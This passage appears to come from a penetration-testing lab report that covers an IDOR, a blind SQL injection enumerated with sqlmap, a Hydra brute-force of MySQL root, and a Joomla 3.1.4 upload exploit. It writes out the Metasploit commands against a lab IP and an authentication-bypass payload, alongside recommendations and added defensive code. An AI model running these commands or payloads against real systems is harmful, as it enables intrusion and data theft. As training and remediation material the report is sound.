After logging in successfully, we found that viewprofiles.aspx has an insecure direct object reference: we can change the ID parameter to any value.

a) With id=4, we found Steve’s information.

b) Because moviescope and xsecurity run on the same machine, we continued to exploit the Blind SQL Injection to enumerate the databases using sqlmap on the Kali Linux machine:

We found 9 databases on this host.

From this result, we focused on the database named “Xsecurity”.

We found three tables and continued by enumerating the columns of the Users table.

We then dumped the user data from the Users table, with the result shown below.

c) SQL Server version

Impact:
If this vulnerability is successfully exploited, SQL injection can be used to perform the following types of attacks:
• Authentication bypass: the attacker can enter the network without providing any authentic user name or password and gain access over the network, obtaining the highest privilege in the network.
• Information disclosure: after unauthorized entry into the network, the attacker gains access to the sensitive data stored in the database.
• Compromised data integrity: the attacker changes the main content of the website and inserts malicious content into it.
• Compromised availability of data: the attacker uses this type of attack to delete audit-related data or any other crucial database information.
• Remote code execution: an attacker could modify, delete, or create data, or even create new accounts with full user rights on the servers that share files and folders, allowing the attacker to compromise the host operating system.
Result Analysis:
The most common operation in SQL is the query, performed with the declarative SELECT statement. A SELECT statement retrieves data from one or more tables. SQL queries allow a user to describe the desired data and leave the DBMS (Database Management System) responsible for optimizing, planning, and performing the physical operations. A SQL query lists, after the SELECT keyword, the columns to be included in the final result.
Recommendations
• Make no assumptions about the size, type, or content of the data that is received by your application. Test the size and data type of input and enforce appropriate limits to prevent buffer overruns.
• Test the content of string variables and accept only expected values.
• Reject entries that contain binary data, escape sequences, and comment characters.
• Never build Transact-SQL statements directly from user input; use stored procedures to validate user input.
• Implement multiple layers of validation and never concatenate user input that is not validated.
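An added example (not code from the report or the moviescope application) contrasting the concatenated login query behind this finding with a parameterised one, plus the ownership check that viewprofiles.aspx lacked. It uses Python with an in-memory SQLite table and constructed sample users; the table, column and role names are assumptions.

```python
import sqlite3

# Constructed sample users for the demo (plaintext passwords only for brevity);
# not data from the moviescope or xsecurity databases.
USERS = [
    (1, "admin", "admin-pass", "admin"),
    (4, "steve", "steve-pass", "user"),
]


def make_db():
    """In-memory stand-in for the application's Users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return db


def login_vulnerable(db, txtusername, txtpwd):
    """The pattern behind the finding: form fields concatenated straight into SQL,
    so the password value 1' or 1=1-- turns the WHERE clause into always-true."""
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (txtusername, txtpwd)
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, txtusername, txtpwd):
    """Parameterised query: the quote and the -- in the input stay data, never syntax."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (txtusername, txtpwd)).fetchone()
    return row[0] if row else None


def can_view_profile(db, session_user_id, requested_id):
    """The check missing at viewprofiles.aspx: only the owner or an admin may view."""
    row = db.execute("SELECT role FROM users WHERE id=?", (session_user_id,)).fetchone()
    return row is not None and (requested_id == session_user_id or row[0] == "admin")


def view_profile(db, session_user_id, requested_id):
    """Serve the profile only after the ownership/role check passes."""
    if not can_view_profile(db, session_user_id, requested_id):
        raise PermissionError("user %d may not view profile %d" % (session_user_id, requested_id))
    row = db.execute("SELECT username FROM users WHERE id=?", (requested_id,)).fetchone()
    return row[0] if row else None
```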
[Challenge 10:] Database Penetration Testing – Brute-Force MySQL authentication
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
Enumeration: A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.
Exploitation:
Based on the result of Challenge 01, we have a machine named "ECOMM" with IP address 10.10.0.3. This machine has port 3306 open for the MySQL service. We tried to brute-force that service with Hydra.

We found the credentials username: root, password: test. We dumped all databases to a local file and used Notepad to view the data.

Viewing the dump file:

Impact: Control of MySQL with full (root) privileges; sensitive information is exposed.

Result Analysis: The exploit shows how to brute-force passwords permitted by a weak password policy.
Recommendations
• Set a stronger password policy:
- Require users to create complex passwords
- Limit the number of times a user can unsuccessfully attempt to log in
- Temporarily lock out users who exceed the specified maximum number of failed login attempts
• Harden servers/services following best practice.
• Configure the firewall to restrict which IP addresses may connect to port 3306.
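An added example, not from the report, implementing the lockout recommendation shared by the Active Directory (Challenge 8) and MySQL findings: a failed-attempt window with a temporary lockout, keyed per user and source address. The thresholds are assumed values, and the simulation feeds the one-guess-per-second failure stream that a wordlist attack such as the one above produces.

```python
from collections import defaultdict, deque

class LoginLimiter:
    """Failed-attempt limit with temporary lockout, as recommended for the AD and MySQL
    findings. Thresholds are assumed values, not from the report. Keys are (username,
    source_ip) so one guessing host is locked out without denying the real user elsewhere."""

    def __init__(self, max_failures=5, window_seconds=300, lockout_seconds=900):
        self.max_failures = max_failures
        self.window_seconds = window_seconds
        self.lockout_seconds = lockout_seconds
        self._failures = defaultdict(deque)  # key -> timestamps of recent failures
        self._locked_until = {}              # key -> time the lockout expires

    def is_locked(self, key, now):
        until = self._locked_until.get(key)
        if until is None:
            return False
        if now >= until:  # lockout expired: reset the counters
            del self._locked_until[key]
            self._failures[key].clear()
            return False
        return True

    def record_failure(self, key, now):
        """Register a failed login; returns True if this attempt triggered a lockout."""
        window = self._failures[key]
        window.append(now)
        while window and now - window[0] > self.window_seconds:
            window.popleft()
        if len(window) >= self.max_failures:
            self._locked_until[key] = now + self.lockout_seconds
            return True
        return False

    def record_success(self, key):
        """A successful login clears the failure history for that key."""
        self._failures[key].clear()


def simulate_guessing(limiter, key, guesses, start=0.0):
    """Feed one failed guess per second (the pattern a wordlist attack produces) and
    return how many guesses were actually checked before the lockout refused the rest."""
    evaluated = 0
    for i in range(guesses):
        now = start + i
        if limiter.is_locked(key, now):
            continue  # refused before any password comparison
        evaluated += 1
        limiter.record_failure(key, now)
    return evaluated
```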
[Challenge 11:] Penetration Testing Joomla Site for component Vulnerabilities
Category: Authorization
Vendor Reference: -
PCI Vuln: Yes
Threat Description:
If your Joomla website uses a vulnerable component, you’re at risk. Successful exploitation of these bugs could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including usernames, (hashed) passwords and, in certain configurations, Joomla Secret Keys (which could result in a total site takeover). Auditing the security of the Joomla installation and its components will be an important task during your security assessment and pen testing assignment if your organization uses a Joomla installation.
Enumeration:
First, we found that the website is running Joomla by viewing the page source.

We started by enumerating the Joomla version, which can be found by browsing to the XML manifest file as shown below.

Knowing that the machine named “RDDept” hosts a website running Joomla version 3.1.4, which has many known vulnerabilities, we observed that CVE-2013-5576 applies to it. After quick research, we identified that the component related to this CVE is vulnerable to arbitrary file upload. For proof of concept, we started by uploading arbitrary PHP code to the website via the Joomla Media Manager file upload component in order to attain remote access to the target server. We launched msfconsole and used the joomla_media_upload_exec exploit with the following commands:
• use exploit/unix/webapp/joomla_media_upload_exec
• set RHOST 172.19.19.9
• set TARGETURI ECSA/
• run

Exploitation:
When we ran the exploit, it started exploiting the vulnerable component in Joomla, i.e., the arbitrary file upload, and remote code execution was performed. After a wait of 2-3 minutes, a meterpreter session appeared, indicating successful code execution as shown in the screenshot.

After exploitation, we took the hash value of the file “RnD NDA.pdf” as the challenge requested:

Impact:
The vulnerability allows for arbitrary file upload and remote code execution.
Result Analysis:
The above exploit shows that a vulnerable component can allow an attacker to compromise the complete hosting machine.
Recommendations:
Upgrade to Joomla 3.15 or newer
